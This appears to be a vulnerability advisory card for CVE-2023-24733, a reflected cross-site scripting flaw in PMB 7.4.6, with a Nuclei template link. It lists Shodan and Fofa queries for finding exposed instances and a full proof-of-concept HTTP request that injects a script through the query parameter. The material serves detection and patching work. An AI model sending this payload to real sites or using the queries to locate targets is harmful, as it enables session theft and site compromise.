| Title | PMB 7.4.6 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. |
| CVSS Score | 6.1 |
| EPSS Score | 0.11698 |
| CVE ID | CVE-2023-24733 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:1469328760http.html:"pmb group" |
| Fofa Query | body="pmb group"icon_hash=1469328760 |
| Tags | cve cve2023 unauth xss pmb pmb_project sigb vkev vuln |
PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GET /pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24733.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-24733.pcap
N/AN/A